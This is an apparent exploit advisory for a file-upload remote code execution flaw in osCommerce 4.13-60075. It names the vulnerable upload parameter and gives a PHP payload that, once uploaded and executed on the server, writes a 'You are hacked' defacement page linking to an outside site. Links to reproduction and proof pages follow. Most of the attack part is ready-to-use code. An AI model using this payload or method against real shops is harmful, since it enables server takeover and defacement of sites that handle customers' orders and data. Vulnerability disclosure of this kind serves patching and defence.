osCommerce 4.13-60075 Shell Upload

## Title: osCommerce 4.13-60075 File-Upload-RCE## Author: nu11secur1ty## Date: 12/14/2023## Vendor: https://www.oscommerce.com/## Software: https://www.oscommerce.com/download-file## Reference: https://portswigger.net/web-security/file-upload## Description:The parameter "icon-pencil"  in the upload-file dz-clickable functionis vulnerable for File upload and Remote Code Execution then!The attacker easily can destroy this system if he is a kracker, greyhat, or some kind of stupid kid. More:{https://portswigger.net/web-security/file-upload}. In this scenario,I just uploaded a PHP exploit which created a second file directly onthe server and then I executed it DIRECTLY on theserver, by using just a browser. This can be executed with moremethods but we can talk about it later. =)STATUS: CRITICAL Vulnerability[+]Exploit:```<?php// @nu11secur1ty 2023$myfile = fopen("hacked.html", "w") or die("Unable to open file!");$txt = "<p>You are hacked</p>\n";fwrite($myfile, $txt);$txt = "<p><p>This is not good for you</p>\n<ahref='https://sell.sawbrokers.com/domain/malicious.com/'target='_blank'>Youcan visit our website for more information!</a></p>\n";fwrite($myfile, $txt);fclose($myfile);?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oscommerce.com/osCommerce-4.13-60075)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/12/oscommerce-413-60075-file-upload-rce.html)## Time spent:00:15:00